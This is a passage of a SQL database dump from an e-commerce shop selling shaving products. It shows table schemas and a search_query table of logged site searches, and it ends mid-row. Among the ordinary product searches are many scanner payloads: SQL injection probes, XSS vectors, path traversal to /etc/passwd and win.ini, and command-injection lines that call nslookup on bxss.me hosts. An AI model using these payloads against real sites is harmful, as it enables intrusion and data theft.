-- Table structure for table `salesrule_website`
--

CREATE TABLE `salesrule_website` (
  `rule_id` int unsigned NOT NULL COMMENT 'Rule ID',
  `website_id` smallint unsigned NOT NULL COMMENT 'Website ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Rules To Websites Relations';

--
-- Dumping data for table `salesrule_website`
--


--
-- Table structure for table `search_query`
--

CREATE TABLE `search_query` (
  `query_id` int unsigned NOT NULL COMMENT 'Query ID',
  `query_text` varchar(255) DEFAULT NULL COMMENT 'Query text',
  `num_results` int unsigned NOT NULL DEFAULT '0' COMMENT 'Num results',
  `popularity` int unsigned NOT NULL DEFAULT '0' COMMENT 'Popularity',
  `redirect` varchar(255) DEFAULT NULL COMMENT 'Redirect',
  `store_id` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Store ID',
  `display_in_terms` smallint NOT NULL DEFAULT '1' COMMENT 'Display in terms',
  `is_active` smallint DEFAULT '1' COMMENT 'Active status',
  `is_processed` smallint DEFAULT '0' COMMENT 'Processed status',
  `updated_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'Updated at'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Search query table';

--
-- Dumping data for table `search_query`
--

INSERT INTO `search_query` VALUES (1,'razor bump',19,37,NULL,3,1,1,0,'2022-08-27 02:19:38'),(3,'fghjk',0,1,NULL,1,1,1,0,'2020-09-07 12:33:47'),(4,'gel',6,1,NULL,1,1,1,0,'2020-11-06 05:06:16'),(5,'shave gel',24,24,NULL,1,1,1,0,'2020-11-10 00:35:36'),(6,'q',0,0,NULL,1,1,1,0,'2020-11-01 14:11:38'),(8,'q\'',0,0,NULL,1,1,1,0,'2020-11-01 14:11:43'),(9,'q\"',0,0,NULL,1,1,1,0,'2020-11-01 14:11:45'),(10,'q\\',0,0,NULL,1,1,1,0,'2020-11-01 14:11:46'),(11,'q\'--',0,6,NULL,1,1,1,0,'2024-02-19 13:13:48'),(13,'q\'/*',0,6,NULL,1,1,1,0,'2024-02-19 11:50:12'),(16,'q ORDER BY 100',1,8,NULL,1,1,1,0,'2020-11-07 15:50:11'),(18,'q-1\"/*',0,24,NULL,1,1,1,0,'2024-02-19 19:25:38'),(21,'q?\'',0,6,NULL,1,1,1,0,'2024-02-19 19:14:28'),(23,'q1 OR 0x50=0x50',0,1,NULL,1,1,1,0,'2020-11-01 14:12:10'),(25,'qq',0,0,NULL,1,1,1,0,'2020-11-01 14:42:20'),(26,'qqq',0,1,NULL,1,1,1,0,'2020-11-01 14:53:14'),(27,'georgetown',0,1,NULL,3,1,1,0,'2024-02-11 18:06:41'),(29,'eazor',0,1,NULL,3,1,1,0,'2020-12-08 19:40:24'),(32,'myosh',0,2,NULL,3,1,1,0,'2020-12-10 15:53:16'),(34,'myoshi',1,1,NULL,1,1,1,0,'2020-12-10 15:36:33'),(38,'silver chill',0,3,NULL,3,1,1,0,'2021-08-08 22:57:33'),(40,'IT-34500',21,1,NULL,1,1,1,0,'2020-12-21 16:05:40'),(42,'AP31222',1,1,NULL,1,1,1,0,'2020-12-22 20:07:40'),(44,'aberdeen',1,1,NULL,1,1,1,0,'2020-12-29 05:32:45'),(46,'IT-41122',0,1,NULL,3,1,1,0,'2024-02-12 01:38:14'),(47,'cbd',0,3,NULL,3,1,1,0,'2021-01-16 00:04:46'),(48,'Tweezers',0,1,NULL,3,1,1,0,'2021-02-02 08:31:15'),(50,'Ingrown hair',61,1,NULL,3,1,1,0,'2021-02-13 03:42:21'),(51,'allenbrook',0,1,NULL,3,1,1,0,'2024-02-11 15:49:34'),(53,'brentwood',0,1,NULL,3,1,1,0,'2024-02-12 12:17:03'),(55,'brentwood',1,1,NULL,1,1,1,0,'2021-02-26 04:40:35'),(57,'imperial touch',83,4,NULL,3,1,1,0,'2021-07-10 07:33:51'),(61,'dandruff',0,2,NULL,3,1,1,0,'2024-02-12 12:31:09'),(65,'forest',0,1,NULL,3,1,1,0,'2024-02-12 09:12:05'),(66,'forest glen',1,1,NULL,1,1,1,0,'2021-02-26 20:24:40'),(69,'shaving soap',81,2,NULL,1,1,1,0,'2021-02-26 21:12:33'),(73,'monticello',0,3,NULL,1,1,1,0,'2024-02-19 16:48:01'),(78,'monticello',0,1,NULL,3,1,1,0,'2024-02-12 10:36:20'),(80,'silver chill black',17,3,NULL,1,1,1,0,'2021-02-27 14:33:43'),(86,'IT-M7',20,1,NULL,1,1,1,0,'2021-03-02 07:07:34'),(88,'Dr. Feel Good',89,1,NULL,3,1,1,0,'2021-03-06 09:37:53'),(90,'razor bump solution',19,6,NULL,3,1,1,0,'2022-06-20 16:10:04'),(96,'IT-11140',0,3,NULL,3,1,1,0,'2024-02-12 02:57:55'),(98,'IT-11140',0,3,NULL,1,1,1,0,'2024-02-19 12:33:52'),(103,'forest glen',1,1,NULL,3,1,1,0,'2021-03-28 19:00:30'),(104,'US-160CT',0,1,NULL,3,1,1,0,'2024-02-12 15:01:00'),(106,'Contact',1,1,NULL,1,1,1,0,'2021-04-16 22:29:44'),(108,'IT-Ship1',0,1,NULL,3,1,1,0,'2024-02-11 18:40:10'),(109,'Ingrown',0,1,NULL,3,1,1,0,'2024-02-11 18:34:10'),(112,'\"><script>alert(document.URL)</script>',0,5,NULL,1,1,1,0,'2021-12-05 11:10:57'),(114,'Shaving cream',76,2,NULL,3,1,1,0,'2021-06-06 03:25:37'),(118,'Shaving gel',77,1,NULL,3,1,1,0,'2021-06-06 03:25:43'),(119,'razors',0,4,NULL,3,1,1,0,'2024-02-12 04:41:41'),(123,'razor',0,5,NULL,3,1,1,0,'2024-02-12 00:36:29'),(140,'Luxe Moisture Shave Gel 8 oz.',78,1,NULL,3,1,1,0,'2021-07-01 13:54:29'),(142,'Damascus',0,2,NULL,3,1,1,0,'2024-02-12 14:14:16'),(150,'danbury',0,1,NULL,3,1,1,0,'2021-07-10 08:52:13'),(152,'razor pouch',75,1,NULL,3,1,1,0,'2021-07-10 08:53:10'),(154,'pouch',0,1,NULL,3,1,1,0,'2024-02-11 16:38:12'),(156,'..,\",).,\',',0,1,NULL,1,1,1,0,'2021-08-04 13:12:38'),(158,'\'QCicmV<\'\">zuNNEy',0,1,NULL,1,1,1,0,'2021-08-04 13:12:42'),(160,') AND 6009=3633 AND (1098=1098',22,1,NULL,1,1,1,0,'2021-08-04 13:12:46'),(162,') AND 9351=9351 AND (8640=8640',22,1,NULL,1,1,1,0,'2021-08-04 13:12:49'),(164,'AND 3963=6468',22,1,NULL,1,1,1,0,'2021-08-04 13:12:53'),(166,'AND 9351=9351',22,1,NULL,1,1,1,0,'2021-08-04 13:12:55'),(168,'\') AND 6170=1962 AND (\'xLDY\'=\'xLDY',22,1,NULL,1,1,1,0,'2021-08-04 13:12:58'),(170,'\') AND 9351=9351 AND (\'OQeM\'=\'OQeM',22,1,NULL,1,1,1,0,'2021-08-04 13:13:01'),(172,'\' AND 3918=2454 AND \'SqzO\'=\'SqzO',22,1,NULL,1,1,1,0,'2021-08-04 13:13:04'),(174,'\' AND 9351=9351 AND \'HmSm\'=\'HmSm',22,1,NULL,1,1,1,0,'2021-08-04 13:13:06'),(176,'AND 9005=7079-- luoB',22,1,NULL,1,1,1,0,'2021-08-04 13:13:09'),(178,'AND 9351=9351-- OsWv',22,1,NULL,1,1,1,0,'2021-08-04 13:13:11'),(180,'(SELECT (CASE WHEN (5312=5900) THEN \'\' ELSE (SELECT 5900 UNION SELECT 9610) END))',7,1,NULL,1,1,1,0,'2021-08-04 13:13:13'),(182,'(SELECT (CASE WHEN (1855=1855) THEN \'\' ELSE (SELECT 5416 UNION SELECT 3651) END))',7,1,NULL,1,1,1,0,'2021-08-04 13:13:15'),(184,') AND EXTRACTVALUE(6651,CONCAT(0x5c,0x716b716271,(SELECT (ELT(6651=6651,1))),0x7176767671)) AND (2054=2054',22,1,NULL,1,1,1,0,'2021-08-04 13:13:18'),(186,'AND EXTRACTVALUE(6651,CONCAT(0x5c,0x716b716271,(SELECT (ELT(6651=6651,1))),0x7176767671))',22,1,NULL,1,1,1,0,'2021-08-04 13:13:20'),(188,'\') AND EXTRACTVALUE(6651,CONCAT(0x5c,0x716b716271,(SELECT (ELT(6651=6651,1))),0x7176767671)) AND (\'rAhQ\'=\'rAhQ',22,1,NULL,1,1,1,0,'2021-08-04 13:13:22'),(190,'\' AND EXTRACTVALUE(6651,CONCAT(0x5c,0x716b716271,(SELECT (ELT(6651=6651,1))),0x7176767671)) AND \'yWXJ\'=\'yWXJ',22,1,NULL,1,1,1,0,'2021-08-04 13:13:24'),(192,'AND EXTRACTVALUE(6651,CONCAT(0x5c,0x716b716271,(SELECT (ELT(6651=6651,1))),0x7176767671))-- pNDh',22,1,NULL,1,1,1,0,'2021-08-04 13:13:26'),(194,') AND 7881=CAST((CHR(113)||CHR(107)||CHR(113)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7881=7881) THEN 1 ELSE 0 END))::text||(CH',22,1,NULL,1,1,1,0,'2021-08-04 13:13:28'),(196,'AND 7881=CAST((CHR(113)||CHR(107)||CHR(113)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7881=7881) THEN 1 ELSE 0 END))::text||(CHR(',22,1,NULL,1,1,1,0,'2021-08-04 13:13:31'),(198,'\') AND 7881=CAST((CHR(113)||CHR(107)||CHR(113)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7881=7881) THEN 1 ELSE 0 END))::text||(C',22,1,NULL,1,1,1,0,'2021-08-04 13:13:33'),(200,'\' AND 7881=CAST((CHR(113)||CHR(107)||CHR(113)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7881=7881) THEN 1 ELSE 0 END))::text||(CH',22,1,NULL,1,1,1,0,'2021-08-04 13:13:35'),(203,') AND 2375 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2375=2375) THEN CHAR(49) ELSE CHAR(4',22,1,NULL,1,1,1,0,'2021-08-04 13:13:40'),(205,'AND 2375 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2375=2375) THEN CHAR(49) ELSE CHAR(48)',22,1,NULL,1,1,1,0,'2021-08-04 13:13:42'),(207,'\') AND 2375 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2375=2375) THEN CHAR(49) ELSE CHAR(',22,1,NULL,1,1,1,0,'2021-08-04 13:13:44'),(209,'\' AND 2375 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2375=2375) THEN CHAR(49) ELSE CHAR(4',22,1,NULL,1,1,1,0,'2021-08-04 13:13:47'),(212,') AND 8504=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(113)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8504=850',22,1,NULL,1,1,1,0,'2021-08-04 13:13:51'),(214,'AND 8504=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(113)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8504=8504)',22,1,NULL,1,1,1,0,'2021-08-04 13:13:53'),(216,'\') AND 8504=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(113)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8504=85',22,1,NULL,1,1,1,0,'2021-08-04 13:13:55'),(218,'\' AND 8504=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(113)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8504=850',22,1,NULL,1,1,1,0,'2021-08-04 13:13:57'),(221,') ORDER BY 1-- ntFA',10,1,NULL,1,1,1,0,'2021-08-04 13:14:02'),(223,'ORDER BY 1-- lxAR',10,1,NULL,1,1,1,0,'2021-08-04 13:14:04'),(225,'\') ORDER BY 1-- sAjH',10,1,NULL,1,1,1,0,'2021-08-04 13:14:06'),(227,'\' ORDER BY 1-- AYJS',10,1,NULL,1,1,1,0,'2021-08-04 13:14:08'),(229,'ORDER BY 1-- fYBu',10,1,NULL,1,1,1,0,'2021-08-04 13:14:10'),(231,'hair bump',13,3,NULL,3,1,1,0,'2021-08-05 19:10:55'),(237,'\'!',0,0,NULL,3,1,1,0,'2021-08-06 17:37:44'),(240,'razor bump remedy',0,1,NULL,2,1,1,0,'2021-09-06 10:13:03'),(242,'loremipsum0.3156105409690234',0,1,NULL,1,1,1,0,'2021-09-14 05:14:47'),(244,'kl hat',0,2,NULL,1,1,1,0,'2021-09-17 21:07:05'),(246,'chanel',0,2,NULL,1,1,1,0,'2021-09-17 21:09:05'),(248,'FUCIDIN',0,2,NULL,1,1,1,0,'2021-09-17 21:10:09'),(250,'lagerfeld hat',0,2,NULL,1,1,1,0,'2021-09-17 21:08:08'),(252,'myle',0,2,NULL,1,1,1,0,'2021-09-17 23:20:36'),(253,'XXX',0,3,NULL,3,1,1,0,'2021-11-08 00:12:10'),(259,'w2a02s2llz',0,1,NULL,3,1,1,0,'2021-11-08 00:12:12'),(261,'\"></meta><ScRiPt>alert(1)</sCrIpT>',0,1,NULL,3,1,1,0,'2024-02-25 09:37:58'),(264,'\"></meta><SvG/oNloAd=alert(1)>',0,1,NULL,3,1,1,0,'2024-02-26 01:53:52'),(266,'\"></meta><SvG/oNloAd=alert(1)//',0,1,NULL,3,1,1,0,'2024-02-25 09:56:13'),(268,'\"></meta><ScRiPt>(alert)(1);</ScRiPt>',0,1,NULL,3,1,1,0,'2024-02-25 12:07:35'),(270,'\"></meta><ImG src=z oNeRror=alert(1)>',12,1,NULL,3,1,1,0,'2021-11-08 00:12:36'),(273,'\"></meta><object data=\"javascript:alert(1)\">',12,2,NULL,3,1,1,0,'2021-11-08 00:12:46'),(277,'\"></meta><object data=\'JaVasCript:alert(1)\'>',12,1,NULL,3,1,1,0,'2021-11-08 00:12:50'),(279,'\"></meta><iFrAme src=\"jAvasCript:alert(1);\"></iframe>',12,1,NULL,3,1,1,0,'2021-11-08 00:12:52'),(281,'\"></meta><details open ontoggle=confirm(1)>',17,1,NULL,3,1,1,0,'2021-11-08 00:12:55'),(283,'\"></meta><body/oNpagEshoW=(confirm)(1)>',0,1,NULL,3,1,1,0,'2024-02-25 18:47:05'),(285,'\"></meta><frameset><frame src=\"javascript:alert(1);\"></frame>',12,1,NULL,3,1,1,0,'2021-11-08 00:13:00'),(287,'\"></meta><marquee loop=1 width=0 onfinish=prompt(1)>',12,1,NULL,3,1,1,0,'2021-11-08 00:13:04'),(289,'\"></meta>><svg><animate onbegin=prompt(1) attributeName=u dur=1s>',24,1,NULL,3,1,1,0,'2021-11-08 00:13:07'),(291,'\"></meta><ImG	src=z	oNeRror=alert(1)>',0,1,NULL,3,1,1,0,'2024-02-25 20:51:03'),(293,'\"></meta>0[FF]<sCripT[FF]>alert(1)</sCripT[FF]>[FF]0',12,1,NULL,3,1,1,0,'2021-11-08 00:13:12'),(295,'\"></meta><ScRiPt	>alert(1)</sCrIpT	>',0,1,NULL,3,1,1,0,'2024-02-25 13:14:50'),(297,'\"></meta><object	data=javAscripT:alert(1)>',12,1,NULL,3,1,1,0,'2021-11-08 00:13:18'),(299,'\"></meta><scr<script>ipt>(alert)(1)//</scr</script>ipt>',0,4,NULL,3,1,1,0,'2024-04-23 19:42:46'),(301,'\"></meta><img src onerror=&emsp;prompt`${1}`>',12,1,NULL,3,1,1,0,'2021-11-08 00:13:24'),(303,'\"></meta><sCrIpt><!--\nconfirm(1)//--></sCrIpt>',0,1,NULL,3,1,1,0,'2024-03-10 03:41:21'),(305,'\"></meta><img src=k onerror=prompt`1`>',17,1,NULL,3,1,1,0,'2021-11-08 00:13:29'),(307,'\"></meta><svg onload=&#x61&#x6C&#x65&#x72&#x74&#x28&#x271&#x27&#x29>',0,1,NULL,3,1,1,0,'2021-11-08 00:13:33'),(309,'\"></meta><input autofocus onfocus =top[(9350252040-8).toString(40-10)](/1_/)>',2,1,NULL,3,1,1,0,'2021-11-08 00:13:37'),(311,'\"></meta><script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]',0,1,NULL,3,1,1,0,'2021-11-08 00:13:40'),(313,'https://openbugbounty.org/',0,1,NULL,3,1,1,0,'2021-11-08 00:13:42'),(315,'\"><script>alert(document.URL)</script>',0,1,NULL,3,1,1,0,'2021-11-11 12:43:36'),(317,'bethpage',0,1,NULL,3,1,1,0,'2024-02-12 03:23:04'),(319,'Beth',0,1,NULL,3,1,1,0,'2024-02-12 09:28:21'),(321,'test',0,3,NULL,1,1,1,0,'2022-12-17 17:54:06'),(323,'JJJ11QQQ',0,3,NULL,1,1,1,0,'2021-12-02 00:01:22'),(325,'the',0,126,NULL,1,1,1,0,'2024-02-19 20:48:11'),(328,'13E9ZwtX',0,1,NULL,1,1,1,0,'2021-12-01 18:50:26'),(330,'the\' AND 2*3*8=6*8 AND \'0TGp\'=\'0TGp',24,1,NULL,1,1,1,0,'2021-12-01 18:50:29'),(332,'the\" AND 2*3*8=6*8 AND \"HSSw\"=\"HSSw',24,1,NULL,1,1,1,0,'2021-12-01 18:50:31'),(334,'the%\' AND 2*3*8=6*8 AND \'spYE\'!=\'spYE%',24,1,NULL,1,1,1,0,'2021-12-01 18:50:40'),(336,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003693601623\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003693601623\\u0039\\u0039\\u',23,1,NULL,1,1,1,0,'2021-12-01 18:50:43'),(338,'echo yhjnug$()\\ sbbgbs\\nz^xyu||a #\' &echo yhjnug$()\\ sbbgbs\\nz^xyu||a #|\" &echo yhjnug$()\\ sbbgbs\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 18:50:43'),(340,'-1 OR 2+417-417-1=0+0+0+1',19,1,NULL,1,1,1,0,'2021-12-01 18:50:47'),(342,'Rd2LLF7n',0,1,NULL,1,1,1,0,'2021-12-01 18:50:48'),(344,'aaa&shards=http://hitjeurnybnsg0dac4.bxss.me/solr',16,1,NULL,1,1,1,0,'2021-12-01 18:50:49'),(346,'response.write(9798308*9679566)',0,1,NULL,1,1,1,0,'2021-12-01 18:50:50'),(348,'-1 OR 3+417-417-1=0+0+0+1',14,1,NULL,1,1,1,0,'2021-12-01 18:50:52'),(350,'&echo rbczrs$()\\ zmokwa\\nz^xyu||a #\' &echo rbczrs$()\\ zmokwa\\nz^xyu||a #|\" &echo rbczrs$()\\ zmokwa\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 18:50:53'),(352,'../../../../../../../../../../etc/passwd',0,5,NULL,1,1,1,0,'2021-12-01 23:59:29'),(354,'\'+response.write(9798308*9679566)+\'',0,1,NULL,1,1,1,0,'2021-12-01 18:50:56'),(356,'\"+response.write(9798308*9679566)+\"',0,1,NULL,1,1,1,0,'2021-12-01 18:51:00'),(358,'-1 OR 3*2<(0+5+417-417)',21,1,NULL,1,1,1,0,'2021-12-01 18:51:01'),(360,'the<esi:include src=\"http://bxss.me/rpb.png\"/>',21,4,NULL,1,1,1,0,'2021-12-01 23:59:48'),(362,'http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg',0,5,NULL,1,1,1,0,'2024-03-01 17:52:54'),(363,'-1 OR 3*2>(0+5+417-417)',21,1,NULL,1,1,1,0,'2021-12-01 18:51:05'),(366,'../../../../../../../../../../windows/win.ini',0,5,NULL,1,1,1,0,'2024-02-19 19:07:43'),(368,'${9999410+10000378}',0,1,NULL,1,1,1,0,'2021-12-01 18:51:10'),(370,'|echo sdsjag$()\\ kiymmy\\nz^xyu||a #\' |echo sdsjag$()\\ kiymmy\\nz^xyu||a #|\" |echo sdsjag$()\\ kiymmy\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 18:51:10'),(372,'1some_inexistent_file_with_long_name\0.jpg',0,5,NULL,1,1,1,0,'2021-12-02 00:00:03'),(374,'12345\'\"\\\'\\\");|]*\0{\r\n<\0>?\'\'',0,5,NULL,1,1,1,0,'2021-12-01 23:59:38'),(376,'../the',0,4,NULL,1,1,1,0,'2024-02-20 02:59:38'),(378,'the\' RLIKE (SELECT (CASE WHEN (691=691) THEN 1 ELSE 0x28 END)) --',17,1,NULL,1,1,1,0,'2021-12-01 18:51:15'),(380,'Http://bxss.me/t/fit.txt',0,4,NULL,1,1,1,0,'2024-02-19 16:33:36'),(382,'the\'||\'',0,4,NULL,1,1,1,0,'2024-02-19 09:41:05'),(384,')',0,0,NULL,1,1,1,0,'2021-12-01 18:51:20'),(385,'./the',0,4,NULL,1,1,1,0,'2024-02-20 01:59:06'),(387,'\'.gethostbyname(lc(\'hitlh\'.\'soevzglz464b1.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(118).chr(79).chr(110).chr(67).\'',24,1,NULL,1,1,1,0,'2021-12-01 18:51:22'),(388,'the&n922287=v901318',9,1,NULL,1,1,1,0,'2021-12-01 18:51:23'),(391,';print(md5(31337));',0,6,NULL,1,1,1,0,'2021-12-02 00:00:41'),(393,'(nslookup hitqjqegjuheaf8353.bxss.me||perl -e \"gethostbyname(\'hitqjqegjuheaf8353.bxss.me\')\")',24,1,NULL,1,1,1,0,'2021-12-01 18:51:24'),(394,'http://bxss.me/t/fit.txt?.jpg',0,4,NULL,1,1,1,0,'2024-02-20 04:15:19'),(397,'HttP://bxss.me/t/xss.html?%00',0,5,NULL,1,1,1,0,'2024-02-19 13:13:50'),(399,'!(()&&!|*|*|',0,5,NULL,1,1,1,0,'2021-12-02 00:00:17'),(401,'$(nslookup hittwgrovtzzr5dee8.bxss.me||perl -e \"gethostbyname(\'hittwgrovtzzr5dee8.bxss.me\')\")',24,1,NULL,1,1,1,0,'2021-12-01 18:51:27'),(403,'bxss.me',0,4,NULL,1,1,1,0,'2024-02-19 13:30:49'),(405,'1\'\"',0,4,NULL,1,1,1,0,'2024-02-19 20:12:53'),(407,'\'\"()',0,1,NULL,1,1,1,0,'2021-12-01 18:51:29'),(409,'&(nslookup hitqmgthdmpeubf580.bxss.me||perl -e \"gethostbyname(\'hitqmgthdmpeubf580.bxss.me\')\")&\'\\\"`0&(nslookup hitqmgthdmpeubf580',24,1,NULL,1,1,1,0,'2021-12-01 18:51:30'),(411,'\".gethostbyname(lc(\"hittg\".\"kfdfsmls5848c.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(113).chr(90).chr(105).chr(79).\"',24,1,NULL,1,1,1,0,'2021-12-01 18:51:31'),(413,'1\0????%2527%2522',0,5,NULL,1,1,1,0,'2021-12-01 23:59:05'),(415,'\"+\"A\".concat(70-3).concat(22*4).concat(98).concat(81).concat(114).concat(85)+(require\"socket\"\nSocket.gethostbyname(\"hiteg\"+\"tmho',24,1,NULL,1,1,1,0,'2021-12-01 18:51:33'),(417,'index.php',0,10,NULL,1,1,1,0,'2021-12-02 00:00:45'),(419,'^(#$!@#$)(()))******',0,5,NULL,1,1,1,0,'2021-12-02 00:00:21'),(421,'@@m6OA4',0,1,NULL,1,1,1,0,'2021-12-01 18:51:34'),(423,'|(nslookup hitxvfnpmphnt80678.bxss.me||perl -e \"gethostbyname(\'hitxvfnpmphnt80678.bxss.me\')\")',24,1,NULL,1,1,1,0,'2021-12-01 18:51:35'),(425,'\'+\'A\'.concat(70-3).concat(22*4).concat(98).concat(73).concat(106).concat(70)+(require\'socket\'\nSocket.gethostbyname(\'hitrs\'+\'fsal',24,1,NULL,1,1,1,0,'2021-12-01 18:51:37'),(429,'/xfs.bxss.me',0,4,NULL,1,1,1,0,'2024-02-20 03:23:55'),(431,'\'\"',0,0,NULL,1,1,1,0,'2021-12-01 18:51:38'),(432,')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))',0,5,NULL,1,1,1,0,'2021-12-02 00:00:35'),(434,'bxss.me/t/xss.html?%00',0,4,NULL,1,1,1,0,'2024-02-19 23:39:06'),(436,'`(nslookup hitxwzzlchmpmfe251.bxss.me||perl -e \"gethostbyname(\'hitxwzzlchmpmfe251.bxss.me\')\")`',24,1,NULL,1,1,1,0,'2021-12-01 18:51:42'),(438,'<!--',0,5,NULL,1,1,1,0,'2021-12-02 00:00:54'),(440,'index.php/.',0,5,NULL,1,1,1,0,'2021-12-02 00:00:52'),(442,'the\'\"()&%<acx><ScRiPt >CiIO(9250)</ScRiPt>',9,1,NULL,1,1,1,0,'2021-12-01 18:51:46'),(445,'\';print(md5(31337));$a=\'',0,4,NULL,1,1,1,0,'2024-02-20 06:49:05'),(450,'\";print(md5(31337));$a=\"',0,4,NULL,1,1,1,0,'2024-02-19 23:37:53'),(452,';(nslookup hitqfcbombkhy9b551.bxss.me||perl -e \"gethostbyname(\'hitqfcbombkhy9b551.bxss.me\')\")|(nslookup hitqfcbombkhy9b551.bxss.',24,1,NULL,1,1,1,0,'2021-12-01 18:51:53'),(454,'${@print(md5(31337))}',0,5,NULL,1,1,1,0,'2021-12-02 00:01:08'),(456,'951824',0,1,NULL,1,1,1,0,'2021-12-01 18:52:01'),(458,'\'\"()&%<acx><ScRiPt >CiIO(9146)</ScRiPt>',0,1,NULL,1,1,1,0,'2021-12-01 18:52:03'),(460,'the9189913',0,1,NULL,1,1,1,0,'2021-12-01 18:52:07'),(462,'${@print(md5(31337))}\\',0,5,NULL,1,1,1,0,'2021-12-02 00:01:11'),(464,'http://xfs.bxss.me',0,4,NULL,1,1,1,0,'2024-02-19 08:14:32'),(466,'the9189913<',0,1,NULL,1,1,1,0,'2021-12-01 18:52:13'),(468,'\'.print(md5(31337)).\'',0,5,NULL,1,1,1,0,'2021-12-02 00:01:15'),(470,'//xfs.bxss.me',0,4,NULL,1,1,1,0,'2024-02-19 13:26:42'),(472,'acu7682＜s1﹥s2ʺs3ʹuca7682',0,1,NULL,1,1,1,0,'2021-12-01 18:52:24'),(474,'acux8832??z1??z2a?bcxuca8832',0,1,NULL,1,1,1,0,'2021-12-01 18:52:26'),(476,'/\\xfs.bxss.me',0,4,NULL,1,1,1,0,'2024-02-20 02:37:50'),(478,'{{49017*50364}}',0,1,NULL,1,1,1,0,'2021-12-01 18:52:30'),(480,'acu6533＜s1﹥s2ʺs3ʹuca6533',0,1,NULL,1,1,1,0,'2021-12-01 18:52:37'),(482,'acux4681??z1??z2a?bcxuca4681',0,1,NULL,1,1,1,0,'2021-12-01 18:52:41'),(484,'{{49910*49805}}',0,1,NULL,1,1,1,0,'2021-12-01 18:52:44'),(486,'acu5792＜s1﹥s2ʺs3ʹuca5792',0,1,NULL,1,1,1,0,'2021-12-01 18:52:47'),(488,'acux8827??z1??z2a?bcxuca8827',0,1,NULL,1,1,1,0,'2021-12-01 18:52:53'),(490,'{{49216*49479}}',0,1,NULL,1,1,1,0,'2021-12-01 18:53:00'),(492,'acu9991＜s1﹥s2ʺs3ʹuca9991',0,1,NULL,1,1,1,0,'2021-12-01 18:53:08'),(494,'acux3894??z1??z2a?bcxuca3894',0,1,NULL,1,1,1,0,'2021-12-01 18:53:14'),(496,'{{50103*50345}}',0,1,NULL,1,1,1,0,'2021-12-01 18:53:22'),(498,'acu1720＜s1﹥s2ʺs3ʹuca1720',0,1,NULL,1,1,1,0,'2021-12-01 18:53:28'),(500,'acux2547??z1??z2a?bcxuca2547',0,1,NULL,1,1,1,0,'2021-12-01 18:53:36'),(502,'{{49919*50003}}',0,1,NULL,1,1,1,0,'2021-12-01 18:53:42'),(504,'acu1745＜s1﹥s2ʺs3ʹuca1745',0,1,NULL,1,1,1,0,'2021-12-01 18:53:47'),(506,'acux10707??z1??z2a?bcxuca10707',0,1,NULL,1,1,1,0,'2021-12-01 18:53:53'),(508,'{{49167*49326}}',0,1,NULL,1,1,1,0,'2021-12-01 18:53:59'),(510,'acu2585＜s1﹥s2ʺs3ʹuca2585',0,1,NULL,1,1,1,0,'2021-12-01 18:54:04'),(512,'acux9528??z1??z2a?bcxuca9528',0,1,NULL,1,1,1,0,'2021-12-01 18:54:09'),(514,'{{49704*50245}}',0,1,NULL,1,1,1,0,'2021-12-01 18:54:18'),(516,'the\"onmouseover=CiIO(9788)\"',9,1,NULL,1,1,1,0,'2021-12-01 18:54:29'),(518,'the\" VHD1=CiIO([!+!]) Gjx=\"',9,1,NULL,1,1,1,0,'2021-12-01 18:54:45'),(520,'the\\u0022onmouseover=CiIO(9762)\\u0022',9,1,NULL,1,1,1,0,'2021-12-01 18:54:59'),(522,'%74%68%65%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%43%69%49%4F%28%39%38%32%39%29%22',1,1,NULL,1,1,1,0,'2021-12-01 18:55:32'),(525,'?\"onmouseover=CiIO(9743)//',0,1,NULL,1,1,1,0,'2021-12-01 18:56:09'),(527,'the\"sTYLe=\'acu:Expre/**/SSion(CiIO(9612))\'bad=\"',10,1,NULL,1,1,1,0,'2021-12-01 18:56:17'),(529,'the\"><script>CiIO(9581)</script>',9,1,NULL,1,1,1,0,'2021-12-01 18:56:22'),(531,'the</title><ScRiPt >CiIO(9569)</ScRiPt>',9,1,NULL,1,1,1,0,'2021-12-01 18:56:39'),(533,'the<ScRiPt >CiIO(9942)</ScRiPt>',9,1,NULL,1,1,1,0,'2021-12-01 18:56:42'),(535,'the<WFWFWI>HLLNC[!+!]</WFWFWI>',9,1,NULL,1,1,1,0,'2021-12-01 18:56:46'),(537,'the<script>CiIO(9906)</script>',9,1,NULL,1,1,1,0,'2021-12-01 